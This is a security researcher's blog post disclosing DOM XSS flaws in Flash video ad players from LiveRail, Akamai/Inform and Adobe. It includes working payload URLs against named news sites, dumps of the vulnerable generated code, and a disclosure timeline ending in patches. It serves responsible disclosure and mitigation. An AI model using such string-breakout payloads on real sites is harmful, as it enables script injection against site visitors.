Shortly after my recent blog post concerning widespread XSS in ad network code, I discovered similar vulnerabilities in Flash video ads (and other Flash products/components), resulting in a substantial industry-wide mitigation of XSS in Flash-to-JavaScript communication. Perhaps most interestingly, these vulnerabilities presented risks similar to my previous findings except that, in most cases, Ad-Block solutions employed by the client would not have prevented exploitation.

It all started with a DOM XSS payload (similar to my previous post), for example:

http://www.cnn.com/#'-alert(1)-'"-alert(1)-"

Though this payload did not trigger the exact previous vulnerability, it produced console errors suggesting it was exploitable.

I found similar console errors across many top-tier sites, leading me to dig deeper into the root cause. After tracing the source of the console errors, I completed the syntax to produce a successful payload against one of CNN’s video ads:

http://www.cnn.com/#3617\"})))}catch(e){}alert(3617),console.log(3617)//

Here is the vulnerable code allowing my payload to execute arbitrary JavaScript on the client:

try { __flash__toXML(LiveRail.handshake(41710, ({ LR_MUTED: "0", LR_BROWSER_FEATURES: "{\"mode\":\"fast\"}", LR_WIDTH: 300, served_creative_id: "", served_connection_id: "", LR_HEIGHT: 250, LR_PLAYER_HEIGHT: 250, LR_VIDEO_POSITION: 0, blacklist_order_id: "", LR_PLAYER_WIDTH: 300, LR_ADMAP: "in::0", LR_VIEWPORT_HEIGHT: "955", LR_PAGE_URL: "http://www.cnn.com/#3617\\" }))) } catch (e) {} alert(3617), console.log(3617) //",LR_ADUNIT:"in",LR_VIEWABLE_RATIO:"1",LR_POD_CURRENT:1,LR_POD_SLOTS:1,LR_VIEWPORT_WIDTH:"1903",LR_WINDOW_REFERRER:"",LR_VIEWABLE:1,LR_IFRAME:1,served_order_id:"",LR_LOCALE:"en_US",blacklist_connection_id:"",LR_SDK_VERSION:"2.5.6",failed_creative_id:"",LR_INTEGRATION:"vpaid",LR_WINDOW_DEPTH:0,LR_SDK:"flash",LR_PUBLISHER_ID:"173926",LR_SCENARIO:"",LR_FORMAT:"video/mp4;video/x-flv;application/x-shockwave-flash;image/jpeg;image/png;image/gif",LR_WINDOW_LOCATION:"http://www.cnn.com/#3617\\"})))}catch(e){}alert(3617),console.log(3617)//",LR_PLAYER_OBJECT_ID:"vpaid_548d_c4d7_fe72_9ff1",LR_SLOT_INDEX:0,LR_SCHEMA:"liverail",LR_RETRY_INDEX:0,LR_URL:"http://www.cnn.com",LR_ADTYPE:2,LR_ADAPTERS:"LR,VPAID,GIMA,GOOG,GAFV,YUME,TMAC",LR_AUTOPLAY:"1",LR_PLUGIN_BROWSER_FEATURES:"{\"ua\":\"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36\",\"version\":\"5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36\",\"platform\":\"Win32\",\"isIframe\":true,\"ref\":\"http://www.cnn.com/\",\"url\":\"http://www.cnn.com/#3617\\\\"})))}catch(e){}alert(3617),console.log(3617)//\",\"width\":1920,\"height\":1080,\"awidth\":1920,\"aheight\":1080,\"left\":0,\"top\":0,\"css_all\":true,\"cfq\":true,\"cssvar\":false,\"scope\":false,\"sticky\":false,\"scroll\":false,\"plugins\":5,\"pmode\":false,\"colorDepth\":24,\"websql\":true,\"dnd\":true,\"ce\":true,\"imp\":true,\"tz\":300,\"ogg\":true,\"dialog\":true,\"video\":true,\"audio\":true,\"ac\":true,\"ancestor\":\"http://www.cnn.com\",\"chrome\":true,\"chromewebstore\":true,\"random\":true,\"ie\":true,\"userdata\":true,\"srcset\":true,\"canvas\":true,\"emoji\":true,\"pic\":true,\"wc\":true,\"ext\":false,\"pop\":false,\"href\":\"http://www.cnn.com/#3617\\\\"})))}catch(e){}alert(3617),console.log(3617)//\",\"devorient\":true,\"devmotion\":true,\"canvasfp\":2089077168,\"time\":11.710000000000036}"}))) ; } catch (e) { "<undefined/>"; }

Note the LR_PAGE_URL value above which breaks out of the string using two backslashes — one provided by my payload in the URL, while the other seems to be added by the code that processes the input. This code obviously isn’t handling escape sequences correctly, which is the cause of the DOM XSS vulnerability.

I noticed a similar vulnerability in several different Flash components involving the same __flash__toXML function, though I couldn’t find it defined in any of the surrounding code. It turns out that this function is implemented by Flash, for instance, when developers make a call to ExternalInterface.call() in order to pass data from Flash to JavaScript on the page. Below is an example scenario using such a call in order to send data to a logging server:

As you can see, Flash wraps the JavaScript function in a try/catch and executes the specified function with its parameters (however unsafely). The mishandling of these parameters seems to be a weakness in Flash’s implementation of ExternalInterface in general, rather than an issue with individual projects using it. After researching the issue a bit more (see here and here), it seems that Adobe does not plan on fixing it, leaving it up to developers to mitigate. One such mitigation is the use of base64 encoding when passing parameters. This would limit the characters in the resulting JavaScript strings such that special characters would be impossible.

Disclosure

While identifying affected sites was straightforward, tracing individual vulnerabilities to a responsible vendor was not. In many cases, an affected site may not have triggered the payload on every page view due to the nature of the components involved. Further, a given page view could have used a combination of Flash components which only added to the complexity of identifying the source.

LiveRail (Facebook)

As shown in the above example, LiveRail’s Flash Ad Player was affected by this issue, so I began researching contacts in order to report it. Since LiveRail was acquired by Facebook in 2014, I felt good about reporting it — until I realized LiveRail was out of scope per Facebook’s bug bounty terms.

@RandyWestergren @LiveRail @facebook Go ahead and submit to the Bug Bounty portal and they will route/make a call on scope. — Alex Stamos (@alexstamos) March 9, 2016

Understandably, I wasn’t entitled to a bounty payout, but I wanted to get the issue patched regardless. Thanks to Alex’s quick response, I reported it to Facebook on 2016-03-09 and, after a little back and forth with their security team, it was patched on 2016-03-10.

Akamai/Inform

A number of the sites affected by this vulnerability were partnered with Inform — a 100% video digital advertising company. The company’s “NDN Widget” was vulnerable, of course impacting all customers using it. Here’s a sample payload and the respective vulnerable code:

http://www.breitbart.com/video/2016/01/13/sharyl-attkisson/#3617\"})));console.log(3617),alert(1);}catch(e){}//

try { __flash__toXML(document.getElementById('flashObject1457458873401').eventHandler("mediaPlayerResourceDependenciesLoaded", ({ context_menu_label: "AMP Premier - NDN v1.34.0.0001", show_play_button_overlay: "false", share_enabled: "true", share_mode: "2", externalTarget: "_top", auto_play_list: "false", auto_play: "false", core_ads_enabled: "true", settings_json: "{\"resources\":[{\"id\":\"AkamaiAdvancedStreamingPlugin\",\"src\":\"http%3A//players.edgesuite.net/flash/plugins/osmf/advanced-streaming-plugin/v3.9/osmf2.0/AkamaiAdvancedStreamingPlugin.swf\",\"absolute\":true,\"host\":\"osmf\",\"main\":\"com.akamai.osmf.AkamaiAdvancedStreamingPluginInfo\",\"type\":\"application/x-shockwave-flash\",\"loaded\":true},{\"id\":\"ErrorMessagingPlugin\",\"src\":\"http%3A//launch.newsinc.com/120/resources/plugins/ErrorMessagingPlugin.swf\",\"blocking\":false,\"host\":\"akamai\",\"main\":\"ErrorMessagingPlugin\",\"type\":\"application/x-shockwave-flash\",\"loaded\":true},{\"id\":\"VideoMetricsViewPlugin\",\"src\":\"http%3A//launch.newsinc.com/120/resources/plugins/VideoMetricsViewPlugin.swf\",\"blocking\":false,\"host\":\"akamai\",\"main\":\"VideoMetricsViewPlugin\",\"type\":\"application/x-shockwave-flash\",\"loaded\":true},{\"id\":\"VideoStatsInfoOverlayPlugin\",\"src\":\"http%3A//launch.newsinc.com/120/resources/plugins/VideoStatsInfoOverlayPlugin.swf\",\"blocking\":false,\"host\":\"akamai\",\"main\":\"VideoStatsInfoOverlayPlugin\",\"type\":\"application/x-shockwave-flash\",\"loaded\":true}],\"domain\":\"newsinc.com\",\"target\":\"_top\",\"plugins\":{\"AkamaiAdvancedStreamingPlugin\":\"com.akamai.osmf.AkamaiAdvancedStreamingPluginInfo\",\"ComscorePlugin\":\"http%3A//launch.newsinc.com/120/resources/plugins/ComscorePlugin.swf\",\"ComscoreStreamSensePlugin\":\"http%3A//launch.newsinc.com/120/resources/plugins/ComscoreStreamSensePlugin.swf\"},\"paths\":{\"player\":\"http%3A//launch.newsinc.com/120/js/lib/amp.premier/\",\"resources\":\"http%3A//launch.newsinc.com/120/resources/\"},\"fullscreen\":{\"native\":true},\"controls\":{\"autoHide\":5,\"mode\":\"auto\"},\"info\":{\"title\":\"%23%7Bmedia.title%7D\",\"description\":\"%23%7Bmedia.description%7D\",\"provider\":{\"name\":\"%23%7Bmedia.metadata%5B%27ndn-provider%27%5D.name%7D\",\"image\":\"%23%7Bmedia.metadata%5B%27ndn-provider%27%5D.image%7D\"},\"enabled\":false},\"share\":{\"facebook\":true,\"twitter\":true,\"enabled\":true},\"comscore\":{\"url\":\"http%3A//b.scorecardresearch.com/b\",\"data\":{\"c1\":\"1\",\"c2\":\"11112732\",\"c3\":\"%23%7BdistributorName%7D\",\"c4\":\"%23%7Bmedia.metadata%5B%27ndn-provider%27%5D.name%7D\",\"c5\":\"\",\"c6\":\"%23%7BsiteSection%7D\",\"c10\":\"%23%7BproducerCategory%7D\"},\"events\":{\"ads\":[{\"type\":\"started\",\"data\":{\"c4\":\"%23%7Bmedia.metadata%5B%27ndn-provider%27%5D.name%7D%2009\",\"c5\":\"09\"}}],\"video\":[{\"type\":\"started\",\"data\":{\"c4\":\"%23%7Bmedia.metadata%5B%27ndn-provider%27%5D.name%7D%20%23%7BmediaAnalyticsC5Value%7D\",\"c5\":\"%23%7BmediaAnalyticsC5Value%7D\"}}]},\"enabled\":false},\"comscorestreamsense\":{\"enabled\":false,\"resources\":[{\"type\":\"text/javascript\",\"src\":\"http%3A//launch.newsinc.com/120/resources/js/streamsense.4.1412.05.min.js\"}],\"data\":{\"clientId\":\"11112732\",\"publisherSecret\":\"c3798e9f708f2d61a9cf8232b0503d5a\",\"metadata\":{\"ads\":{\"ns_st_ci\":\"%23%7BvideoAssetId%7D\",\"c3\":\"%23%7BdistributorName%7D\",\"c4\":\"%23%7Bmedia.metadata%5B%27ndn-provider%27%5D.name%7D\",\"c6\":\"%23%7BsiteSection%7D\",\"ca2\":\"null\",\"ca4\":\"null\",\"ca6\":\"null\"},\"video\":{\"ns_st_ci\":\"%23%7BvideoAssetId%7D\",\"c3\":\"%23%7BdistributorName%7D\",\"c4\":\"%23%7Bmedia.metadata%5B%27ndn-provider%27%5D.name%7D\",\"c6\":\"%23%7BsiteSection%7D\",\"ca2\":\"%23%7BcomscoreCa2%7D\",\"ca3\":\"%23%7BcomscoreCa3%7D\",\"ca6\":\"null\"}}}},\"ima\":{\"version\":3,\"resources\":[{\"type\":\"text/javascript\",\"src\":\"http%3A//s0.2mdn.net/instream/html5/ima3.js\",\"debug\":\"//imasdk.googleapis.com/js/sdkloader/ima3_debug.js\"},{\"id\":\"GoogleIMAPlugin\",\"src\":\"http%3A//launch.newsinc.com/120/resources/plugins/GoogleIMAPlugin.swf\",\"blocking\":false,\"host\":\"akamai\",\"main\":\"GoogleIMAPlugin\",\"type\":\"application/x-shockwave-flash\"},{\"id\":\"IMAOverlayAdPlugin\",\"src\":\"http%3A//launch.newsinc.com/120/resources/plugins/IMAOverlayAdPlugin.swf\",\"blocking\":false,\"host\":\"akamai\",\"main\":\"IMAOverlayAdPlugin\",\"type\":\"application/x-shockwave-flash\"}],\"vpaidAllowed\":true,\"vpaidMode\":\"enabled\",\"companion\":{\"width\":\"300\",\"height\":\"250\"},\"adTagUrl\":\"http%3A//", \"enabled\":true,\"ppid\":\"5dab09596436462a2981336d8a5f01dd\",\"disableCompanionAds\":true},\"auditude\":{\"enabled\":false,\"resources\":[{\"type\":\"text/javascript\",\"src\":\"http%3A//adunit.cdn.auditude.com/player/js/lib/plugin/1.3/aud.html5player.js\"}],\"defaultId\":\"ndn_default\",\"videoId\":\"%23%7BvideoAssetId%7D\",\"domain\":\"auditude.com\",\"zoneId\":\"%23%7Baud_zone_id%7D\",\"version\":\"ndn-1.0\",\"params\":\"%23%7BauditudeParams%7D\",\"userData\":{\"videotype\":\"%23%7Bplayer.mode%7D\"}},\"autoplay\":false,\"volumepanel\":{},\"volume\":0.75,\"playoverlay\":{\"enabled\":false},\"language\":\"en\",\"debug\":false,\"mode\":\"flash\",\"feed\":{\"enabled\":true},\"captioning\":{\"enabled\":true,\"resources\":[{\"id\":\"AdobeCaptionPlugin\",\"src\":\"http%3A//launch.newsinc.com/120/resources/plugins/AdobeCaptionPlugin.swf\",\"blocking\":false,\"host\":\"akamai\",\"main\":\"AdobeCaptionPlugin\",\"type\":\"application/x-shockwave-flash\"},{\"id\":\"AMPCaptionPlugin\",\"src\":\"http%3A//launch.newsinc.com/120/resources/plugins/AMPCaptionPlugin.swf\",\"blocking\":false,\"host\":\"akamai\",\"main\":\"AMPCaptionPlugin\",\"type\":\"application/x-shockwave-flash\"},{\"id\":\"CaptionSettingsPlugin\",\"src\":\"http%3A//launch.newsinc.com/120/resources/plugins/CaptionSettingsPlugin.swf\",\"blocking\":false,\"host\":\"akamai\",\"main\":\"CaptionSettingsPlugin\",\"type\":\"application/x-shockwave-flash\"}]},\"version\":\"AMP%20Premier%20-%20NDN%20v1.34.0.0001\"}", next_video_timer: "-1", hinting_rules: "{\"flashTablets\":{\"label\":\"Android 2 & 3 or Kindle Fire 1\",\"regexp\":\"Android [23]|Silk/1\"},\"html5Phones\":{\"label\":\"iPhone\",\"regexp\":\"iPhone\"},\"html5Tablets\":{\"label\":\"HTML5 Tablets\",\"regexp\":\"iPad|Android 4|Silk/2\"},\"desktop\":{\"label\":\"Desktop\",\"regexp\":\"^((?!iPad|iPhone|Android|BlackBerry|PlayBook|Silk).)*$\"},\"android_4_gets_m3u8\":{\"regexp\":\"Android 4\"}}", context_menu_mode: "short", embedDomain: "newsinc.com", external_target: "_top", locale_setting: "en", volume: "1", ad_server_timeout: "30", suppress_events: "mediaPlayerDataFeedUpdated", settings_xml: "<application><player ad_control_enabled=\"true\" ad_server_timeout=\"20\" auto_replay=\"false\" branding_preload=\"none\" core_player_name=\"ndn-player\" dvr_enabled=\"0\" fullscreen_enabled=\"true\" hds_live_low_latency=\"true\" mbr_start_index=\"2\" netsession_install_prompt_frequency_secs=\"-1\" show_feature_bar=\"false\" use_last_known_bitrate=\"false\" use_netsession_client=\"false\" volume=\"75\"></player><locale id=\"en\"/><locales><locale id=\"en\"><property key=\"MSG_TIME_SEPARATOR\"> / </property><property key=\"MSG_EMAIL_TO\">To</property><property key=\"MSG_EMAIL_FROM\">From</property><property key=\"MSG_EMAIL_VIDEO\">Email this video</property><property key=\"MSG_EMAIL_MESSAGE_DEFAULT\">Check out this video from xxx</property><property key=\"MSG_EMAIL_MESSAGE\">Message</property><property key=\"MSG_EMAIL_ADDRESS_INVALID\">Invalid Email Address</property><property key=\"MSG_EMAIL_MESSAGE_INVALID\">Please limit your message to 500 characters or less.</property><property key=\"MSG_EMAIL_CHARACTERS_REMAINING_TEXT\"> characters left</property><property key=\"MSG_EMAIL_SEND_FAILURE\">Message could not be sent.</property><property key=\"MSG_EMAIL_SEND_SUCCESS_MESSAGE\">Your email has been sent!</property><property key=\"MSG_SHARE_VIDEO_TEXT\">Share this video...</property><property key=\"MSG_POST_TEXT\">Post</property><property key=\"MSG_EMBED_TEXT\">Embed</property><property key=\"MSG_LINK_TEXT\">Link</property><property key=\"MSG_SHARE_CONNECT_FAILURE\">Unable to connect. Please try again.</property><property key=\"MSG_SHARE_CONTENT_DISABLED\">Share and embed are disabled.</property><property key=\"MSG_VERSION_TEXT\">Version</property><property key=\"MSG_BUFFERING_TEXT\">buffering</property><property key=\"MSG_CUSTOMIZE_CLIP_POINTS\">Customize the start and end point of the video.</property><property key=\"MSG_PAUSE\">Pause</property><property key=\"MSG_PREVIEW\">Preview</property><property key=\"MSG_CURRENT\">Currrent</property><property key=\"MSG_SEEK_TO\">Seek to</property><property key=\"MSG_LIVE\">LIVE</property><property key=\"MSG_DEFAULT_ERROR_MESSAGE\">Sorry, we were unable to play the media you selected. Please try again, or select alternate media.</property><property key=\"MSG_ERROR_PREFIX\">Error encountered:</property><property key=\"MSG_STREAM_NOT_FOUND\">Stream not found</property><property key=\"MSG_CURRENT_WORKING_BANDWIDTH\">Current working bandwidth</property><property key=\"MSG_CURRENT_BITRATE_PLAYING\">Current bitrate playing</property><property key=\"MSG_MAX_BITRATE_AVAILABLE\">Max bitrate available</property><property key=\"MSG_NOT_AVAILABLE\">Not Available</property><property key=\"MSG_GO_LIVE\">GO LIVE</property><property key=\"MSG_REPLAY\">Replay</property><property key=\"MSG_NEXT_VIDEO\">Starts in </property><property key=\"MSG_RECOMMENDED\">Recommended</property><property key=\"MSG_VIEW_ALL\">View all </property><property key=\"MSG_VIDEO\"> videos</property><property key=\"MSG_CC\">CC</property><property key=\"MSG_CC_TITLE\">Caption</property><property key=\"MSG_CC_LANGUAGE\">Track :</property><property key=\"MSG_CC_PRESETS\">Presets :</property><property key=\"MSG_CC_FONT\">Font :</property><property key=\"MSG_CC_EDGE\">Edge :</property><property key=\"MSG_CC_SIZE\">Size :</property><property key=\"MSG_CC_SCROLL\">Scroll :</property><property key=\"MSG_CC_COLOR\">Color :</property><property key=\"MSG_CC_BACKGROUND\">Background :</property><property key=\"MSG_CC_WINDOW\">Window :</property><property key=\"MSG_CC_OPACITY\">Opacity :</property><property key=\"MSG_CC_SHOW_ADVANCED\">Show Advanced Settings</property><property key=\"MSG_CC_HIDE_ADVANCED\">Hide Advanced Settings</property><property key=\"MSG_NEXT_AD\">Next ad starts in: </property><property key=\"MSG_CC_RESET\">Default</property><property key=\"MSG_CC_CANCEL\">Cancel</property><property key=\"MSG_CC_APPLY\">Apply</property><property key=\"MSG_EN\">English</property><property key=\"MSG_ES\">Spanish</property><property key=\"MSG_DE\">German</property><property key=\"MSG_FR\">French</property><property key=\"MSG_IT\">Italian</property><property key=\"MSG_RU\">Russian</property><property key=\"MSG_ZH\">Chinese</property><property key=\"MSG_CHROMECAST_MESSAGE\">Video playing on another screen</property><property key=\"MSG_RETRY_MESSAGE\">Content not yet available, retrying in</property><property key=\"MSG_SECONDS\">seconds</property><property key=\"MSG_RETRY_FAILED\">Retry failed</property><property key=\"MSG_RECOMMENDATIONS_TITLE\">Recommended</property></locale><locale id=\"es\"><property key=\"MSG_TIME_SEPARATOR\"> / </property><property key=\"MSG_EMAIL_TO\">a</property><property key=\"MSG_EMAIL_FROM\">de</property><property key=\"MSG_EMAIL_VIDEO\">Enviar este vídeo</property><property key=\"MSG_EMAIL_MESSAGE_DEFAULT\">Echa un vistazo a este video de xxx</property><property key=\"MSG_EMAIL_MESSAGE\">mensaje</property><property key=\"MSG_EMAIL_ADDRESS_INVALID\">Dirección de correo electrónico no válida</property><property key=\"MSG_EMAIL_MESSAGE_INVALID\">Por favor limite su mensaje a 500 caracteres o menos.</property><property key=\"MSG_EMAIL_CHARACTERS_REMAINING_TEXT\">personajes de la izquierda</property><property key=\"MSG_EMAIL_SEND_FAILURE\">El mensaje no pudo ser enviado.</property><property key=\"MSG_EMAIL_SEND_SUCCESS_MESSAGE\">Tu email ha sido enviado!</property><property key=\"MSG_SHARE_VIDEO_TEXT\">Comparte este vídeo...</property><property key=\"MSG_POST_TEXT\">enviar</property><property key=\"MSG_EMBED_TEXT\">incrustar</property><property key=\"MSG_LINK_TEXT\">enlace</property><property key=\"MSG_SHARE_CONNECT_FAILURE\">No se puede conectar. Por favor, inténtelo de nuevo.</property><property key=\"MSG_SHARE_CONTENT_DISABLED\">Compartir e incrustar están desactivados.</property><property key=\"MSG_VERSION_TEXT\">versión</property><property key=\"MSG_BUFFERING_TEXT\">el almacenamiento en búfer</property><property key=\"MSG_CUSTOMIZE_CLIP_POINTS\">Personalizar el inicio y el punto final del video.</property><property key=\"MSG_PAUSE\">romper</property><property key=\"MSG_PREVIEW\">vista previa</property><property key=\"MSG_CURRENT\">corriente</property><property key=\"MSG_SEEK_TO\">Tratar de</property><property key=\"MSG_LIVE\">EN VIVO</property><property key=\"MSG_DEFAULT_ERROR_MESSAGE\">Lo sentimos, no hemos podido jugar los medios de comunicación seleccionados. Por favor, inténtelo de nuevo, o seleccionar los medios de comunicación alternativos.</property><property key=\"MSG_ERROR_PREFIX\">Se produjo un error:</property><property key=\"MSG_STREAM_NOT_FOUND\">Stream que no se encuentra</property><property key=\"MSG_CURRENT_WORKING_BANDWIDTH\">Ancho de banda actual de trabajo</property><property key=\"MSG_CURRENT_BITRATE_PLAYING\">Tasa de bits de reproducción actual</property><property key=\"MSG_MAX_BITRATE_AVAILABLE\">Tasa de bits máxima disponible</property><property key=\"MSG_NOT_AVAILABLE\">No está disponible</property><property key=\"MSG_GO_LIVE\">IR A VIVIR</property><property key=\"MSG_REPLAY\">Repetir</property><property key=\"MSG_NEXT_VIDEO\">El próximo video comienza en: </property><property key=\"MSG_RECOMMENDED\">Recomendado</property><property key=\"MSG_CC\">CC</property><property key=\"MSG_VIEW_ALL\">ver todo </property><property key=\"MSG_VIDEO\"> vídeos.</property><property key=\"MSG_EN\">Inglés</property><property key=\"MSG_ES\">Español</property><property key=\"MSG_DE\">Alemán</property><property key=\"MSG_FR\">Francés</property><property key=\"MSG_IT\">Italiano</property><property key=\"MSG_RU\">Ruso</property><property key=\"MSG_ZH\">Chino</property><property key=\"MSG_RETRY_MESSAGE\">Content not yet available, retrying in</property><property key=\"MSG_SECONDS\">seconds</property><property key=\"MSG_RETRY_FAILED\">Retry failed</property><property key=\"MSG_RECOMMENDATIONS_TITLE\">Recomendado</property></locale></locales><admedia><vendor id=\"dfp\"><property key=\"DFP_AD_TAG_URL\"><![CDATA[]></property><property key=\"DFP_PPID\">5dab09596436462a2981336d8a5f01dd</property><property key=\"disableCompanionAds\">true</property></vendor></admedia><plugins><plugin id=\"AkamaiAdvancedStreamingPlugin\" absolute=\"true\" host=\"osmf\" type=\"dynamic\" loaded=\"true\">http://players.edgesuite.net/flash/plugins/osmf/advanced-streaming-plugin/v3.9/osmf2.0/AkamaiAdvancedStreamingPlugin.swf</plugin><plugin id=\"ErrorMessagingPlugin\" blocking=\"false\" host=\"akamai\" type=\"dynamic\" loaded=\"true\">http://launch.newsinc.com/120/resources/plugins/ErrorMessagingPlugin.swf</plugin><plugin id=\"VideoMetricsViewPlugin\" blocking=\"false\" host=\"akamai\" type=\"dynamic\" loaded=\"true\">http://launch.newsinc.com/120/resources/plugins/VideoMetricsViewPlugin.swf</plugin><plugin id=\"VideoStatsInfoOverlayPlugin\" blocking=\"false\" host=\"akamai\" type=\"dynamic\" loaded=\"true\">http://launch.newsinc.com/120/resources/plugins/VideoStatsInfoOverlayPlugin.swf</plugin><plugin id=\"GoogleIMAPlugin\" blocking=\"false\" host=\"akamai\" type=\"dynamic\">http://launch.newsinc.com/120/resources/plugins/GoogleIMAPlugin.swf</plugin><plugin id=\"IMAOverlayAdPlugin\" blocking=\"false\" host=\"akamai\" type=\"dynamic\">http://launch.newsinc.com/120/resources/plugins/IMAOverlayAdPlugin.swf</plugin><plugin id=\"AdobeCaptionPlugin\" blocking=\"false\" host=\"akamai\" type=\"dynamic\">http://launch.newsinc.com/120/resources/plugins/AdobeCaptionPlugin.swf</plugin><plugin id=\"AMPCaptionPlugin\" blocking=\"false\" host=\"akamai\" type=\"dynamic\">http://launch.newsinc.com/120/resources/plugins/AMPCaptionPlugin.swf</plugin><plugin id=\"CaptionSettingsPlugin\" blocking=\"false\" host=\"akamai\" type=\"dynamic\">http://launch.newsinc.com/120/resources/plugins/CaptionSettingsPlugin.swf</plugin></plugins><view skin=\"http://launch.newsinc.com/120/js/lib/amp.premier/ndn.assets.swf\"><element id=\"captionDisplay\" initState=\"cookie\" position=\"relative\" settingsEnabled=\"true\" style=\"bottom: 26%; height:13%; windowColor:0xffffff; windowOpacity:0; font:Arial; fontColor:0xffffff; fontOpacity:1; fontBGColor:0x000000; fontBGOpacity:0.6; edgeType:none; edgeColor:0x00ff00; edgeOpacity:1; scroll:none; fontSize:12;\"/><element id=\"controls\" scrubPosition=\"top\" backgroundAlpha=\".8\" height=\"51\" autoHideDelay=\"1\" transitionTime=\"0.50\"><element id=\"playPauseBtn\"/><element id=\"scrubBar\" collapsedHeight=\"5\" style=\"background: linear-gradient(90deg, #232323 #232323); height: 9px;\"/><element id=\"progressBar\" style=\"background: linear-gradient(90deg, #0099CC #0099CC);\"/><element id=\"loadedBar\" style=\"background: linear-gradient(90deg, #666666 #666666);\"/><element id=\"streamTimeIndicator\" position=\"left\"><element id=\"streamTime\"/><element id=\"streamDuration\" color=\"#666666\"/></element><element id=\"captionBtn\"/><element id=\"shareBtn\"/><element id=\"facebookBtn\"/><element id=\"twitterBtn\"/><element id=\"volumeBar\" backgroundColor=\"#111111\" trackColor=\"#C1C1C3\" color=\"#0099CC\" position=\"relative\" width=\"25\"/><element id=\"volumeBtn\"/><element id=\"fullscreenBtn\"/><element id=\"posterBackground\" color=\"#000000\" alpha=\"1\"/></element><element id=\"loadingView\" radius=\"0\"/><element id=\"adOptions\"><element id=\"adChoices\" target=\"http://assets.newsinc.com/info/adchoices.html\"/><element id=\"adCountdown\"/><element id=\"adCount\"/></element></view></application>", embed_domain: "newsinc.com", auto_replay: "false", ad_media_server_timeout: "30", fullscreen_enabled: "true", controls_mode: "auto", params: "{\"auditude_userDataString\":\"\",\"distributorName\":\"\",\"producerCategory\":\"\",\"producerAuditudeId\":\"\",\"windowLocation\":\"http://www.breitbart.com/video/2016/01/13/sharyl-attkisson/#3617\\\\" }))); console.log(3617), alert(1); } catch (e) {} //\",\"tracking_group\":9999,\"sitesection\":\"ndn\",\"sec\":\"oth\",\"sub\":\"non\",\"plt\":\"11\",\"wgt\":1,\"fp\":0,\"aud_zone_id\":50974,\"aud_default_asset\":\"default_ndn\",\"partner_type\":\"conventional\",\"autoplay\":1,\"continuous_play\":1,\"sound\":1,\"ad_server\":\"none\",\"trans_time\":0,\"size\":\"10x10\",\"player_type\":11,\"launcher_type\":0,\"ads_enabled\":0,\"wid\":0,\"share\":1,\"email\":0,\"device_mode\":1,\"external_url\":\"http://newsinc.com\",\"override_playlist\":0,\"user_token\":\"ZZZZZZZ\",\"embed_type\":0,\"ndn_session_id\":\"\",\"rmm\":0,\"wid_type\":0,\"desc_url_type\":\"http://newsinc.com\"}",domain:"newsinc.com",overlay_ad_delay:"3"}))) ; } catch (e) { "<exception>" + e + "</exception>"; }

Note the vulnerable parameter, in this case, is the windowLocation string within the params property.

Reaching out to Inform ended up being one of my poorer experiences with vendors. Not only were they completely unresponsive in my numerous attempts of contact (until I phoned their office directly), their “Head of Programmatic & Advertising Technology” was quite dismissive of the report and its risks (at least at first). Nevertheless, Inform’s team came to eventually understand the issue, its impact to customers and end users, and worked to get the issue resolved.

After a bit of discussion on the issue, I learned that Inform actually licensed their player through Akamai. After some group discussion between the two organizations, Akamai patched their Adaptive Media Player, resolving the issue for Inform as well as any other users of the player. Akamai had to be contacted multiple times to get status updates, but apparently released a fix on 2016-03-31.

Akamai sent the following communication to their customers:

Akamai was recently notified that one of the components included in the Adaptive Media Player (AMP) for Web contains a cross-site scripting vulnerability. Please upgrade your AMP Web to version 4.45 (Standard) or 2.45 (Premier) to ensure to your AMP is secure. If you have questions or need further assistance, please contact the AMP Support team [email protected]

Adobe

Adobe’s AppMeasurement for Flash library was also affected by this vulnerability, though only impacted sites with debugTracking enabled. An example payload with its respective vulnerable code is below:

http://espn.go.com/mens-college-basketball/story/_/page/word160310/pittsburgh-hang-unc#3617\"}),alert(document.domain),console.log(3617)//

({ time: 148, lineup: null, title: "COM_NCB Analysis (Andy Katz three point shot seg full) 2016/3/10 ODV", genre: null, description: "", hostedAtURL: "http://espn.go.com/mens-college-basketball/story/_/page/word160310/pittsburgh-hang-unc#3617\\" }), alert(document.domain), console.log(3617) //",promo:null,isLiveStream:false,ratings:["0","0","0","0","0","0","0","0","0","0","0"],bucketInfo:"",contentType:"remoteAsset",providerCode:"1kNG061cgaoolOncv54OAO1ceO-I",externalId:"espn:14941366",embedCode:"55cWR3MTE6v-EPCQpOCmzy0e6CHwDCsO"})

Again, the hostedAtURL was vulnerable to the same issue as the other products in this post. I reported the issue to Adobe on 2016-03-11 and they released a fix with a security bulletin (CVE-2016-1036) on 2016-04-21.

Conclusion

Though plans are being made to phase out Flash entirely (at least in Chrome), it’s here to stay for the short term (much to the dismay of the security community). There are likely many additional products in the wild affected by this vulnerability, most of which have probably been vulnerable since their initial release. Until Flash has an end-of-life date announced, serious abandonment of it on the web is likely to be slow, meaning we will continue to discover and mitigate vulnerabilities in similar components for the foreseeable future.

Share this: